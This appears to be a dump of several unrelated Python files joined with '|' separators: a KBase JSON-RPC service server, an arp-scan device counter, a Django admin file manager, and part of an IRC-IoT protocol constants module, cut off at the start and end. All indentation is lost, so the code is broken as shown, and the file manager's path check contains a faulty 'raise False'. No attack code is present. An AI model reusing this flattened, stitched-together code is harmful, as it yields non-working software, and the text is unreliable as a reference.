for f_add in added_folders:
self.workspace.add_folder(WorkspaceFolder(**f_add))
for f_remove in removed_folders:
self.workspace.remove_folder(f_remove["uri"])
def m_workspace__did_change_watched_files(self, changes=None, **_kwargs):
pass
|
contact_mappingServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from contact_mapping.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'contact_mapping'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from contact_mapping.contact_mappingImpl import contact_mapping # noqa @IgnorePep8
impl_contact_mapping = contact_mapping(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'contact_mapping'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_contact_mapping.run_contact_mapping,
name='contact_mapping.run_contact_mapping',
types=[dict])
self.method_authentication['contact_mapping.run_contact_mapping'] = 'required' # noqa
self.rpc_service.add(impl_contact_mapping.status,
name='contact_mapping.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'contact_mapping ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
scanner.py
|
import subprocess
import re
from time import sleep
from threading import Thread
#pattern = re.compile(r'([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}')
pattern = re.compile(r'[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}')
# Function that checks for device presence
def check():
# 30 second pause to allow main thread to finish arp-scan and populate output
sleep(10)
# Loop through checking for devices and counting if they're not present
while True:
# Exits thread if Keyboard Interrupt occurs
if stop == True:
print("Exiting Thread")
exit()
else:
pass
mac_addressess = re.findall(pattern, output)
print(mac_addressess)
devices = len(mac_addressess) - 2
print(str(devices) + " dispositivos conectados")
sleep(10)
# Main thread
try:
# Initialize a variable to trigger threads to exit when True
global stop
stop = False
# Start the thread(s)
# It will start as many threads as there are values in the occupant array
t = Thread(target=check)
t.start()
while True:
# Make output global so the threads can see it
global output
# Assign list of devices on the network to "output"
output = subprocess.getoutput("sudo arp-scan -l")
# Wait 30 seconds between scans
sleep(10)
except KeyboardInterrupt:
# On a keyboard interrupt signal threads to exit
stop = True
exit()
|
views.py
|
import os
import shutil
from datetime import datetime
from os import path, listdir, makedirs
from threading import Thread
import requests
from django.conf import settings
from django.contrib import messages
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.core.exceptions import PermissionDenied
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.urls import reverse
from django.views.generic import TemplateView
from account.permissions import is_admin_or_root
from utils import random_string
from utils.upload import save_uploaded_file_to
class FileManager(UserPassesTestMixin, TemplateView):
template_name = 'filemanager.jinja2'
@staticmethod
def slugify(text):
import re
return re.sub(r'[ /"#!:]+', '_', text)
def dispatch(self, request, *args, **kwargs):
makedirs(settings.MIRROR_DIR, exist_ok=True)
self.position = request.POST.get('q', request.GET.get('q', ''))
self.root = path.join(settings.MIRROR_DIR, self.position)
return super().dispatch(request, *args, **kwargs)
def test_func(self):
if not is_admin_or_root(self.request.user):
return False
if path.commonpath([self.root, settings.MIRROR_DIR]) != settings.MIRROR_DIR:
raise False
return True
def get_context_data(self, **kwargs):
display_dir = self.position + '/'
if '/' not in self.position:
parent_link = ''
else:
parent_link = self.position[0:self.position.rfind('/')]
file_list = []
if not path.isdir(self.root):
file_list = []
messages.add_message(self.request, messages.WARNING, "Directory '%s' does not exist." % display_dir)
else:
for file in listdir(self.root):
file_path = path.join(self.root, file)
file_pos = path.join(self.position, file)
if path.isdir(file_path):
size = '--'
link = reverse('filemanager:index') + '?q=%s' % file_pos
is_dir = True
else:
size = "%d" % path.getsize(file_path)
link = '/upload/mirror/' + file_pos
is_dir = False
file_list.append(dict(name=file, modified=datetime.fromtimestamp(path.getmtime(file_path)).
strftime(settings.DATETIME_FORMAT_TEMPLATE), size=size, link=link, is_dir=is_dir))
return {
'file_list': file_list,
'display_dir': display_dir,
'position': self.position,
'parent_link': parent_link
}
def handle_upload(self, request):
file = request.FILES['file']
save_uploaded_file_to(file, self.root, filename=self.slugify(file.name))
def handle_download(self, request):
def download_file(url, to):
local_filename = url.split('/')[-1]
if local_filename == '':
local_filename = random_string()
r = requests.get(url, stream=True, timeout=30)
with open(path.join(to, local_filename), 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
url = request.POST['url']
Thread(target=download_file, args=(url, self.root)).start()
def handle_rename(self, request):
new_path = path.join(self.root, self.slugify(request.POST['name']))
old_path = path.join(self.root, request.POST['oldName'].replace('/', '_'))
os.rename(old_path, new_path)
def handle_delete(self, request):
file_path = path.join(self.root, request.POST['name'].replace('/', '_'))
if path.isfile(file_path):
os.remove(file_path)
else:
shutil.rmtree(file_path)
def handle_create_new_dir(self, request):
file_path = path.join(self.root, request.POST['name'].replace('/', '_'))
print(file_path)
os.makedirs(file_path, exist_ok=True)
def post(self, request, *args, **kwargs):
t = 'upload'
try:
t = request.POST['type']
if t == 'upload':
self.handle_upload(request)
elif t == 'download':
self.handle_download(request)
elif t == 'rename':
self.handle_rename(request)
elif t == 'delete':
self.handle_delete(request)
elif t == 'createdir':
self.handle_create_new_dir(request)
else:
raise NotImplementedError("Unrecognized query type")
except Exception as e:
messages.add_message(request, messages.ERROR, repr(e))
if t in ['upload', 'download']:
return redirect(reverse('filemanager:index') + '?q=%s' % self.position)
else:
return HttpResponse()
|
rfc1459.py
|
'''
'' PyIRCIoT (PyLayerIRC class)
''
'' Copyright (c) 2018-2020 Alexey Y. Woronov
''
'' By using this file, you agree to the terms and conditions set
'' forth in the LICENSE file which can be found at the top level
'' of this package
''
'' Authors:
'' Alexey Y. Woronov <alexey@woronov.ru>
'''
# Those Global options override default behavior and memory usage
#
DO_debug_library = False
DO_default_draft = "ircu" # Integrator must define IRC software
import socket
import select
import random
import re
import threading
import ssl
try:
import json
except:
import simplejson as json
from queue import Queue
from time import sleep
try: # insecure, but for development
from irciot_shared import *
except:
from PyIRCIoT.irciot_shared import *
if DO_debug_library:
from pprint import pprint
import datetime
class PyLayerIRC( irciot_shared_ ):
class CONST( irciot_shared_.CONST ):
#
irciot_protocol_version = '0.3.33'
#
irciot_library_version = '0.0.229'
#
# Bot specific constants
#
irc_first_wait = 28
irc_micro_wait = 0.12
irc_ident_wait = 8
irc_default_wait = 28
irc_latency_wait = 1
#
irc_default_debug = DO_debug_library
#
irc_default_nick = "MyBot"
irc_default_info = "IRC-IoT Bot"
irc_default_quit = "Bye!"
#
irc_default_server = "irc-iot.nsk.ru"
irc_default_port = 6667
irc_default_ssl_port = 6697
irc_default_password = None
irc_default_ssl = False
irc_default_ident = False
#
irc_default_proxy = None
irc_default_proxy_server = None
irc_default_proxy_port = None
irc_default_proxy_password = None
#
# Will be replaced to channel-list:
irc_default_channel = "#myhome"
irc_default_chankey = None
#
irc_default_silence = 8 # count of irc_default_wait
#
# User options:
irc_aop = 101 # give (+o) him channel operator status
irc_aban = 102 # ban (+b) him on these channels
irc_avo = 103 # give (+v) him a voice on channels
irc_akick = 130 # kick it from these channels
irc_adeop = 131 # take away (-o) his channel operator status
irc_unban = 132 # unban (-b) mask on channels when banned
irc_adevo = 133 # take away (-v) his voice on channels
#
# 0. Unique User ID
# 1. IRC User Mask
# 2. IRC Channel Name
# 3. User Options
# 4. Encryption Private or Secret Key
# 5. Blockchain Private Key
# 6. Last Message ID
# 7. Encryption Key Timeout
# 8. Blockchain Key Timeout
# 9. My last Message ID
#
# Deault Message ID pipeline size:
irc_default_mid_pipeline_size = 16
#
irc_default_users = [
( 1, "iotBot!*irc@irc-iot.nsk.ru", irc_default_channel,
None, None, None, None, None, None, None ),
( 2, "FaceBot!*irc@faceserv*.nsk.ru", irc_default_channel,
irc_aop, None, None, None, None, None, None ),
( 3, "noobot!*bot@irc-iot.nsk.ru", irc_default_channel,
[ irc_aop, irc_unban ], None, None, None, None, None, None ) ]
#
irc_default_talk_with_strangers = False
#
irc_queue_input = 0
irc_queue_output = 1
#
irc_recon_steps = 8
#
irc_input_buffer = ""
#
irc_buffer_size = 3072
#
irc_mode_CLIENT = "CLIENT"
# ^ Connects to IRC server over the network as an IRC client
irc_mode_SERVICE = "SERVICE"
# ^ Connects to IRC server over the network as an IRC service
irc_mode_SERVER = "SERVER"
# ^ Act as an IRC server, accepting connections of IRC clients
irc_layer_modes = [
irc_mode_CLIENT,
irc_mode_SERVICE,
irc_mode_SERVER ]
irc_default_mode = irc_mode_CLIENT
#
irc_default_nick_retry = 3600 # in seconds
irc_default_join_retry = 32 # trys
irc_default_nick_pause = 16 # trys
#
irc_default_network_tag = "IRC-IoT"
#
# According RFC 1459
#
irc_ascii_lowercase = "abcdefghijklmnopqrstuvwxyz"
irc_ascii_uppercase = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
irc_ascii_letters = irc_ascii_lowercase + irc_ascii_uppercase
irc_ascii_digits = "0123456789"
irc_special_chars = "-[]\\`^{}"
irc_nick_first_char = irc_ascii_letters + "[]\\`^{}"
irc_nick_chars = irc_ascii_letters \
+ irc_ascii_digits + irc_special_chars
irc_translation = "".maketrans( \
irc_ascii_uppercase + "[]\\^",
irc_ascii_lowercase + "{}|~")
irc_transmocker = "".maketrans( \
"aAoOBEGgIlSsT-_05891",
"4400836911557_-OSBgl" )
irc_mode_add = "+"
irc_mode_del = "-"
irc_change_modes \
= irc_mode_add \
+ irc_mode_del
irc_umode_op = "o"
irc_umode_voice = "v"
irc_umode_ban = "b"
irc_user_modes \
= irc_umode_op \
+ irc_umode_voice\
+ irc_umode_ban
irc_channel_modes = "psitnm"
irc_extra_modes = "lk"
irc_all_modes \
= irc_user_modes \
+ irc_channel_modes \
+ irc_extra_modes
irc_all_modes_chars \
= irc_change_modes \
+ irc_all_modes
#
irc_nick_regexp = "^[" + irc_ascii_letters \
+ "_`\^\\\[\]\{\}][" + irc_ascii_letters \
+ irc_ascii_digits + "\-_`\^\\\[\]\{\}]{1,12}$"
irc_channel_regexp = "^#[" + irc_ascii_letters \
+ irc_ascii_digits + "\-_\^\[\]\{\}]{1,24}$"
#
irc_default_encoding = irciot_shared_.CONST.enc_UTF8
irc_fallback_encoding = irciot_shared_.CONST.enc_ISO1
#
irc_default_draft = DO_default_draft
irc_additional_drafts = []
#
# 1. "RFC1459" Internet Relay Chat Protocol '1993
# 2. "RFC2812" IRC Draft: Client Protocol '2000
# 3. "asp" -- AspIRCd (Charybdis fork) '2019
# 4. "Bahamut" -- Bahamut, @ DALnet, ver. 2.1.6, '1999-2020
# 5. "beware" -- beware ircd, Delphi based, ver. 2.2.0
# 6. "Charybdis" -- charybdis-ircd, ver. 3.5.0, '2007-2020
# 7. "ConfRoom" -- Conference Room, ver. 1.7.6, '2014
# 8. "discord" -- discordIRCd, js based, ver. 0.5.0 '2018
# 9. "Elemental" -- Elemental-IRCd, ver. 6.6.2, '2016
# 10. "Ergo" -- Ergo (was Oragono), Golang based, ver. 2.8.0, '2012-2021
# 11. "hybrid" -- ircd-hybrid, @ EFNet, ver. 8.2.29
# 12. "Insp" -- Inspircd, ver. 2.0.20, '2015
# 13. "IRCNet" -- IRCNet ircd, @ IRCNet, ver. 2.12.2
# 14. "IRCPlus" -- IRCPlus, for Windows, ver. 5.0, '2001
# 15. "ircu" -- ircd-ircu aka Undernet IRCd, ver. 2.10.12.18
# 16. "Kine" -- KineIRCd, C++, '2002-2005
# 17. "miniircd" -- miniircd, Python based, ver. 1.3, '2003
# 18. "Nefarious" -- Nefarious ircd
# 19. "Nefarious2" -- Nefarious IRCu (ircu fork), ver. 2.0-288, '2020
# 20. "ng" -- ngIRCd aka Next Generation IRCd, ver. 25, '2019
# 21. "plexus" -- PleXusIRCd, C++, '2003-2006
# 22. "pircd" -- Perl IRCd, Perl based, '2002
# 23. "Provision" -- ProvisionIRCd, Python based, '2006
# 24. "pure" -- pureIRCd, CSharp based, '2008
# 25. "Rabbit" -- RabbitIRCD, (UnrealIRCd fork), @ Wheresource '2014
# 26. "ratbox" -- ircd-ratbox, @ EFNet, ver. 3.0.8, '2006
# 27. "Rock" -- rock-ircd aka RockIRCd (UnrealIRCd fork), '2009
# 28. "Rubi" -- RubiIRCd, Ruby based '2009
# 29. "RusNet" -- ircd RusNet, @ RusNet, ver. 1.4.25, '2011
# 30. "seven" -- ircd-seven, ver. 1.1.3, '2007-2019
# 31. "Shadow" -- ShadowIRCd, ver. 6.3.3, '2003
# 32. "snircd" -- snircd (ircu fork), @ QuakeNet, ver. 1.3.4
# 33. "solid" -- solid-ircd (Bahamut fork), ver. 3.4.8, '2004-2013
# 34. "Synchronet" -- Synchronet IRCd, js based, ver. 3.11, '2010-2019
# 35. "Unreal" -- UnrealIRCd, ver. 5.0.9, '1999-2021
# 36. "We" -- WeIRCd, ver. 0.8.2, '2010
# 37. "PyIRCIoT" (when it works in IRC server mode)
#
# Additional drafts extending Internet Relay Chat protocol:
irc_add_plus = "IRC+" # IRC+ Services Protocol
irc_add_v3 = "IRCv3" # Specification 3.2 build on top of the IRC protocol
#
irc_max_nick_length = 15
if irc_default_draft == "ircu":
irc_max_nick_length = 12
irc_max_topic_length = 160
irc_max_network_name_length = 80
#
ircd_Ch_se = [ "Charybdis", "seven" ]
ircd_Ch_se_ra = ircd_Ch_se + [ "ratbox" ]
ircd_Ch_se_ra_pl = ircd_Ch_se_ra + [ "plexus" ]
ircd_Un_Ch_se = [ "Unreal", "Charybdis", "seven" ]
ircd_Un_Ba = [ "Unreal", "Bahamut" ]
ircd_iu_Un_Ba = ircd_Un_Ba + [ "ircu" ]
ircd_iu_sn = [ "ircu", "snircd" ]
ircd_iu_Un_sn = ircd_iu_sn + [ "Unreal" ]
ircd_iu_Un_Ba_sn = ircd_iu_Un_sn + [ "Bahamut" ]
#
if irc_default_draft in ircd_Un_Ch_se:
irc_additional_drafts += [ irc_add_v3 ]
#
irc_default_MTU = 480
if irc_default_draft == "ircu":
irc_default_MTU = 440
if irc_add_v3 in irc_additional_drafts:
#irc_default_MTU = 1024 (line-length-3.3)
pass
#
RPL_WELCOME = "001"
RPL_YOURHOST = "002"
RPL_CREATED = "003"
RPL_MYINFO = "004"
if irc_default_draft == "RFC2812":
RPL_BOUNCE = "005"
else:
RPL_ISUPPORT = "005"
if irc_default_draft == "Unreal":
RPL_MAP = "006"
RPL_MAPEND = "007"
if irc_default_draft == "ircu":
RPL_SNOMASK = "008"
RPL_STATMEMTOT = "009"
RPL_STATMEM = "010"
if irc_default_draft in [ "Unreal", "Charybdis", "hybrid", \
"seven", "IRCNet", "plexus", "ratbox" ]:
RPL_REDIR = "010"
if irc_default_draft == "ircu":
RPL_MAP = "015"
RPL_MAPMORE = "016"
RPL_MAPEND = "017"
if irc_default_draft == "IRCNet":
RPL_MAPSTART = "018"
RPL_HELLO = "020"
if irc_default_draft in ircd_iu_sn:
RPL_APASSWARN_SET = "030"
RPL_APASSWARN_SECRET = "031"
RPL_APASSWARN_CLEAR = "032"
if irc_default_draft == "Unreal":
RPL_YOURID = "042"
ERR_REMOTEISUPPORT = "105"
RPL_TRACELINK = "200"
RPL_TRACECONNECTING = "201"
RPL_TRACEHANDSHAKE = "202"
RPL_TRACEUNKNOWN = "203"
RPL_TRACEOPERATOR = "204"
RPL_TRACEUSER = "205"
RPL_TRACESERVER = "206"
if irc_default_draft == "plexus":
RPL_TRACECAPTURED = "207"
else:
RPL_TRACESERVICE = "207"
RPL_TRACENEWTYPE = "208"
RPL_TRACECLASS = "209"
if irc_default_draft == "Unreal":
RPL_STATSHELP = "210"
if irc_default_draft == "IRCNet":
RPL_TRACERECONNECT = "210"
RPL_STATSLINKINFO = "211"
RPL_STATSCOMMANDS = "212"
RPL_STATSCLINE = "213"
RPL_STATSOLDNLINE = "214"
RPL_STATSILINE = "215"
RPL_STATSKLINE = "216"
if irc_default_draft in ircd_iu_sn:
RPL_STATSPLINE = "217"
else:
RPL_STATSQLINE = "217"
RPL_STATSYLINE = "218"
RPL_ENDOFSTATS = "219"
if irc_default_draft == "Unreal":
RPL_STATSBLINE = "220"
else:
RPL_STATSWLINE = "220"
RPL_UMODEIS = "221"
if irc_default_draft in ircd_iu_sn:
RPL_STATSJLINE = "222"
if irc_default_draft == "Unreal":
RPL_SQLINE_NICK = "222"
if irc_default_draft == "Bahamut":
RPL_STATSELINE = "223"
if irc_default_draft == "Unreal":
